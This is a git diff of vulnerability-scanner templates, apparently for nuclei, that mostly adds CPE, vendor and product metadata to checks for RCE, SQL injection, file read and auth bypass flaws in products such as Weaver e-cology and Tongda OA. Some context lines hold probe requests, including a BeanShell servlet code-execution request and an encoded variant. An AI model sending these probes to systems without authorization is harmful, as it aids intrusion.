a/http/vulnerabilities/other/wapples-firewall-lfi.yaml b/http/vulnerabilities/other/wapples-firewall-lfi.yaml index bb64882e83..64eaa3c065 100644 --- a/http/vulnerabilities/other/wapples-firewall-lfi.yaml +++ b/http/vulnerabilities/other/wapples-firewall-lfi.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.title:"Intelligent WAPPLES" + product: wapples + vendor: pentasecurity tags: wapples,firewall,lfi,authenticated http: diff --git a/http/vulnerabilities/other/webpagetest-ssrf.yaml b/http/vulnerabilities/other/webpagetest-ssrf.yaml index 1bd64ad51a..695e3c1af2 100644 --- a/http/vulnerabilities/other/webpagetest-ssrf.yaml +++ b/http/vulnerabilities/other/webpagetest-ssrf.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: title:"WebPageTest" + product: webpagetest + vendor: webpagetest tags: ssrf,webpagetest,oast + classification: + cpe: cpe:2.3:a:webpagetest:webpagetest:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a00473045022100e12c24463f9cca14f59a4f37ff3d86746a9574eff83546d598127763f2ade55402202feb4e13391e119d2a56c67661132463d7c58ea74344e8c03a331d10bcd28f06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e12c24463f9cca14f59a4f37ff3d86746a9574eff83546d598127763f2ade55402202feb4e13391e119d2a56c67661132463d7c58ea74344e8c03a331d10bcd28f06:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/wuzhicms-sqli.yaml b/http/vulnerabilities/other/wuzhicms-sqli.yaml index 9db01f372c..fef83e75f0 100644 --- a/http/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/http/vulnerabilities/other/wuzhicms-sqli.yaml @@ -13,11 +13,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 + cpe: cpe:2.3:a:wuzhicms:wuzhicms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"Wuzhicms" fofa-query: title="Wuzhicms" + product: wuzhicms + vendor: wuzhicms tags: wuzhicms,sqli variables: num: "999999999" diff --git a/http/vulnerabilities/other/xenmobile-server-log4j.yaml b/http/vulnerabilities/other/xenmobile-server-log4j.yaml index 6305003847..f7bba06124 100644 --- a/http/vulnerabilities/other/xenmobile-server-log4j.yaml +++ b/http/vulnerabilities/other/xenmobile-server-log4j.yaml @@ -12,10 +12,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-502 + cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"XenMobile" + product: xenmobile_server + vendor: citrix tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/xxljob-executor-unauth.yaml b/http/vulnerabilities/other/xxljob-executor-unauth.yaml index 772187d123..cec0ef4ec6 100644 --- a/http/vulnerabilities/other/xxljob-executor-unauth.yaml +++ b/http/vulnerabilities/other/xxljob-executor-unauth.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 2 fofa-query: app="XXL-JOB" + product: xxl-job + vendor: xuxueli tags: xxljob,unauth,misconfig,rce + classification: + cpe: cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/other/yeswiki-sql.yaml b/http/vulnerabilities/other/yeswiki-sql.yaml index a4a1b665a5..d54499415f 100644 --- a/http/vulnerabilities/other/yeswiki-sql.yaml +++ b/http/vulnerabilities/other/yeswiki-sql.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 + cpe: cpe:2.3:a:yeswiki:cercopitheque:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"yeswiki" + product: cercopitheque + vendor: yeswiki tags: yeswiki,sqli,huntr variables: num: "999999999" diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml index b12f388299..8c055cab63 100644 --- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:yeswiki:cercopitheque:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.html:"yeswiki" + product: cercopitheque + vendor: yeswiki tags: yeswiki,xss,stored-xss,huntr,intrusive http: diff --git a/http/vulnerabilities/other/yeswiki-xss.yaml b/http/vulnerabilities/other/yeswiki-xss.yaml index a7bcf2cb2e..b6768d26a4 100644 --- a/http/vulnerabilities/other/yeswiki-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cwe-id: CWE-79 + cpe: cpe:2.3:a:yeswiki:yeswiki:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"yeswiki" + product: yeswiki + vendor: yeswiki tags: yeswiki,huntr,xss http: diff --git a/http/vulnerabilities/phpmyadmin-unauth.yaml b/http/vulnerabilities/phpmyadmin-unauth.yaml index e325d74c2d..7619927a38 100644 --- a/http/vulnerabilities/phpmyadmin-unauth.yaml +++ b/http/vulnerabilities/phpmyadmin-unauth.yaml @@ -12,8 +12,12 @@ info: max-request: 6 shodan-query: html:"server_databases.php" fofa-query: body="server_databases.php" + product: phpmyadmin + vendor: phpmyadmin tags: misconfig,phpmyadmin,unauth + classification: + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml index 0c074ed732..01a3c9360b 100644 --- a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml @@ -12,7 +12,11 @@ info: verified: true max-request: 3 fofa-query: title="RG-UAC登录页面" && body="admin" + product: rg-uac + vendor: ruijie tags: rg-uac,file-upload,intrusive,ruijie + classification: + cpe: cpe:2.3:h:ruijie:rg-uac:*:*:*:*:*:*:*:* variables: random_str: "{{rand_base(6)}}" match_str: "{{md5(random_str)}}" @@ -37,4 +41,4 @@ http: - "status_code_1 == 200 && status_code_2 == 200" - "contains(body_2, '{{match_str}}')" condition: and -# digest: 4b0a004830460221009a7c5ba834a96f9836326553b14fe11787d36d06478e011a287734e645e964de022100bd2b9ac186ec1a2565bba42a5ad370496877fc519f64a830aae2159ab3b7bf44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a7c5ba834a96f9836326553b14fe11787d36d06478e011a287734e645e964de022100bd2b9ac186ec1a2565bba42a5ad370496877fc519f64a830aae2159ab3b7bf44:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/ruijie/ruijie-password-leak.yaml b/http/vulnerabilities/ruijie/ruijie-password-leak.yaml index 12dc278c42..fa0280d64b 100644 --- a/http/vulnerabilities/ruijie/ruijie-password-leak.yaml +++ b/http/vulnerabilities/ruijie/ruijie-password-leak.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"Get_Verify_Info" + product: rg-uac_firmware + vendor: ruijie tags: password,leak,ruijie,exposure,firewall,router + classification: + cpe: cpe:2.3:o:ruijie:rg-uac_firmware:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml index 142ad12c55..e4315e3f97 100644 --- a/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml +++ b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: title="SANGFOR | NGAF" + product: next-gen_application_firewall + vendor: sangfor tags: sangfor,lfi + classification: + cpe: cpe:2.3:a:sangfor:next-gen_application_firewall:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml b/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml index cc2218efd6..efdba7bf31 100644 --- a/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml +++ b/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml @@ -13,8 +13,12 @@ info: verified: "true" max-request: 1 shodan-query: html:"Sitecore" + product: sitecore.net + vendor: sitecore tags: xss,sitecore,cms + classification: + cpe: cpe:2.3:a:sitecore:sitecore.net:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml index 707f115b80..d4dab11913 100644 --- a/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml @@ -14,9 +14,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-77 + cpe: cpe:2.3:a:h2database:h2:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:116323821 + product: h2 + vendor: h2database tags: springboot,rce,jolokia http: diff --git a/http/vulnerabilities/thinkphp6-arbitrary-write.yaml b/http/vulnerabilities/thinkphp6-arbitrary-write.yaml index b0e22d6d0f..8ae1c5dddd 100644 --- a/http/vulnerabilities/thinkphp6-arbitrary-write.yaml +++ b/http/vulnerabilities/thinkphp6-arbitrary-write.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 2 shodan-query: title:"ThinkPHP" + product: thinkphp + vendor: thinkphp tags: thinkphp,file-upload,rce + classification: + cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* variables: random_filename: "{{to_lower(rand_base(11))}}" diff --git a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml index 88cad8c7c7..11df35d3dc 100755 --- a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml +++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 2 fofa-query: app="TDXK-通达OA" + product: office_anywhere_2017 + vendor: tongda2000 tags: tongda,fileupload,intrusive,router + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:* variables: string: "tongda-action-uploadfile" @@ -65,4 +69,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042e581b6843ee7348560b8fe21246c3b7751969e2afa7f1fd73c390020032c1e0220789abf641572fc5db8ec7d2db073b66ccdf3122620c04fa572349b59257e5fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042e581b6843ee7348560b8fe21246c3b7751969e2afa7f1fd73c390020032c1e0220789abf641572fc5db8ec7d2db073b66ccdf3122620c04fa572349b59257e5fe0:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/tongda/tongda-auth-bypass.yaml b/http/vulnerabilities/tongda/tongda-auth-bypass.yaml index 007457134a..bf1848e84b 100644 --- a/http/vulnerabilities/tongda/tongda-auth-bypass.yaml +++ b/http/vulnerabilities/tongda/tongda-auth-bypass.yaml @@ -14,8 +14,12 @@ info: shodan-query: title:"通达OA" fofa-query: title="通达OA" zoomeye-query: app:"通达OA" + product: office_anywhere + vendor: tongda2000 tags: tongda,auth-bypass,fuzz + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* http: - raw: - | @@ -37,4 +41,4 @@ http: - "status_code_1 == 200 && status_code_2 == 200" - "contains(body_2,'user_id:') && contains(body_2,'user_name:') && contains(body_2,'var loginUser')" condition: and -# digest: 4a0a00473045022100cf6eb6c3146832a9fd31f8913265b52fc3f58057391d7f8f553d6c50c1fd2de002200254175ba248dd65f2ebf2ed5c9337787d304c2c1222925bd65b7b993550cf9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf6eb6c3146832a9fd31f8913265b52fc3f58057391d7f8f553d6c50c1fd2de002200254175ba248dd65f2ebf2ed5c9337787d304c2c1222925bd65b7b993550cf9b:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml index aff30a4d58..5ff47a466d 100755 --- a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml +++ b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml @@ -12,7 +12,11 @@ info: verified: true max-request: 1 fofa-query: app="TDXK-通达OA" + product: office_anywhere + vendor: tongda2000 tags: tongda,rce + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* variables: num: '999999999' payload: "echo md5({{num}});" diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml index c963fa5a5b..db333b3ca3 100755 --- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml +++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 fofa-query: app="TDXK-通达OA" + product: office_anywhere + vendor: tongda2000 tags: tongda,sqli,intrusive + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml index 82e236196b..c36ee0c649 100755 --- a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml +++ b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: app="TDXK-通达OA" + product: office_anywhere + vendor: tongda2000 tags: tongda,unauth,misconfig + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml b/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml index 8b346b2340..d676145ce2 100755 --- a/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml +++ b/http/vulnerabilities/tongda/tongda-report-func-sqli.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: app="TDXK-通达OA" + product: office_anywhere + vendor: tongda2000 tags: tongda,sqli + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/tongda/tongda-video-file-read.yaml b/http/vulnerabilities/tongda/tongda-video-file-read.yaml index a25dbec320..709c3da4d7 100755 --- a/http/vulnerabilities/tongda/tongda-video-file-read.yaml +++ b/http/vulnerabilities/tongda/tongda-video-file-read.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: icon_hash="1967132225" + product: office_anywhere_2017 + vendor: tongda2000 tags: tongda,lfi + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml b/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml index a5c783caeb..f329ebc72c 100755 --- a/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml +++ b/http/vulnerabilities/tongda/tongdaoa-auth-bypass.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 3 fofa-query: app="TDXK-通达OA" + product: office_anywhere + vendor: tongda2000 tags: tongda,auth-bypass,misconfig + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* flow: http(1) && http(2) && http(3) http: @@ -53,4 +57,4 @@ http: - type: dsl dsl: - 'status_code == 200 && !contains(body,"用户未登录") && contains(body,"loginUser")' -# digest: 4a0a00473045022013452a801bc921f3284065e0d29a2ec63d9a7eb1dd620b6581ce66a6bcb431d7022100cf60512421e59a2e4a7e43f653c6fde533ea31310fdc7727b683831afd0a9f5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022013452a801bc921f3284065e0d29a2ec63d9a7eb1dd620b6581ce66a6bcb431d7022100cf60512421e59a2e4a7e43f653c6fde533ea31310fdc7727b683831afd0a9f5e:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/ueditor/ueditor-ssrf.yaml b/http/vulnerabilities/ueditor/ueditor-ssrf.yaml index c68bfc158a..ab9dbf7f47 100644 --- a/http/vulnerabilities/ueditor/ueditor-ssrf.yaml +++ b/http/vulnerabilities/ueditor/ueditor-ssrf.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 shodan-query: html:"UEditor" + product: ueditor + vendor: baidu tags: ueditor,ssrf + classification: + cpe: cpe:2.3:a:baidu:ueditor:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml index e9430ddd05..86c2a11fe9 100644 --- a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml +++ b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-89 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.component:"vBulletin" + product: vbulletin + vendor: vbulletin tags: packetstorm,vbulletin,ajaxreg,sqli http: @@ -35,4 +38,4 @@ http: - 'status_code == 200' - 'contains_any(header, "bb_lastvisit", "bb_sessionhash")' condition: and -# digest: 490a0046304402202d7d813de0a8693f99f263f8ae3c471a1df83a3d66ed24996d00c9ed53e925b40220550578abe298198870bc27ab620d63cc010feeefecf6f39a3d1c165c206189e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d7d813de0a8693f99f263f8ae3c471a1df83a3d66ed24996d00c9ed53e925b40220550578abe298198870bc27ab620d63cc010feeefecf6f39a3d1c165c206189e4:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml index 21ef067826..14ad245dc9 100644 --- a/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml +++ b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 shodan-query: http.component:"vBulletin" + product: vbulletin + vendor: vbulletin tags: vbulletin,sqli + classification: + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* http: - raw: - | @@ -39,4 +43,4 @@ http: - 200 - 503 condition: or -# digest: 4b0a0048304602210084dd0d783afb78cfa19cc10f84030918f06fe86708e84bc6d5bfdf4ced8fe10c02210094a54b19eb0bb0c4c16160977a3be435769921093900186566c64fa372caafdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084dd0d783afb78cfa19cc10f84030918f06fe86708e84bc6d5bfdf4ced8fe10c02210094a54b19eb0bb0c4c16160977a3be435769921093900186566c64fa372caafdb:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/videoxpert-lfi.yaml b/http/vulnerabilities/videoxpert-lfi.yaml index 8c6998f4c6..6f26481e26 100644 --- a/http/vulnerabilities/videoxpert-lfi.yaml +++ b/http/vulnerabilities/videoxpert-lfi.yaml @@ -12,9 +12,12 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22Directory-Traversal.html + cpe: cpe:2.3:a:schneider-electric:pelco_videoxpert:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"VideoXpert" + product: pelco_videoxpert + vendor: schneider-electric tags: schneider,pelco,packetstorm,lfi,videoxpert http: diff --git a/http/vulnerabilities/vmware/vmware-cloud-xss.yaml b/http/vulnerabilities/vmware/vmware-cloud-xss.yaml index 9b7b9ddf0b..55202c3063 100644 --- a/http/vulnerabilities/vmware/vmware-cloud-xss.yaml +++ b/http/vulnerabilities/vmware/vmware-cloud-xss.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Vmware Cloud" + product: cloud_foundation + vendor: vmware tags: vmware,xss,cloud + classification: + cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205d88d88853e066013a32d7ed78c77379b08fbe8c98a298a83502d5a067bbc726022009d488077eb6df2ebe8abd3325fd96f823689b9ba487057fdb64f6e41fc8d869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205d88d88853e066013a32d7ed78c77379b08fbe8c98a298a83502d5a067bbc726022009d488077eb6df2ebe8abd3325fd96f823689b9ba487057fdb64f6e41fc8d869:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml index 62a22e45cf..37a0316535 100644 --- a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml @@ -14,10 +14,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:vmware:vrealize_operations_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"vRealize Operations Manager" + product: vrealize_operations_manager + vendor: vmware tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml index d32f405472..a910bd9427 100644 --- a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml @@ -17,9 +17,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"VMware VCenter" + product: vcenter_server + vendor: vmware tags: cve,cve2021,rce,jndi,log4j,vcenter,vmware,oast,kev http: diff --git a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml index 806ae9023a..66483bdac5 100644 --- a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml +++ b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml @@ -17,10 +17,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:vmware:vrealize_operations:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"vRealize Operations Tenant App" + product: vrealize_operations + vendor: vmware tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml index 1645c03cdd..8b2f48211a 100755 --- a/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml +++ b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: weaver,ecology,traversal,lfr + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml index 4584920761..91c7c00430 100755 --- a/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml +++ b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 1 fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: ecology,weaver,oa,auth-bypass + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml b/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml index ab5309607b..833edd8712 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml @@ -12,9 +12,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: ecology,sqli http: diff --git a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml index 40adea2e05..3771e1dd1f 100644 --- a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml +++ b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml @@ -12,7 +12,11 @@ info: verified: true max-request: 2 fofa-query: app="泛微-EOffice" + product: e-office + vendor: weaver tags: e-office,weaver,intrusive,file-upload + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml b/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml index 3610ea5855..2ead9eb6a4 100644 --- a/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: weaver,ecology,sqli + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml index d3a1ef83b1..2539484618 100755 --- a/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml +++ b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml @@ -11,8 +11,12 @@ info: max-request: 2 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: beanshell,rce,weaver + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - raw: - | @@ -21,13 +25,12 @@ http: Content-Type: application/x-www-form-urlencoded bsh.script=print%28%22{{randstr}}%22%29%3B - - | # bypass waf + - | POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded %62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b - matchers-condition: and matchers: - type: regex diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml index e187956800..bbceca8e42 100755 --- a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml @@ -13,7 +13,11 @@ info: max-request: 2 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: ecology,weaver,oa,sqli + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* variables: num: "999999999" diff --git a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml index 92cef0c85e..03c04d9446 100755 --- a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml @@ -13,7 +13,11 @@ info: max-request: 1 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: ecology,weaver,oa,sqli + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* variables: num: 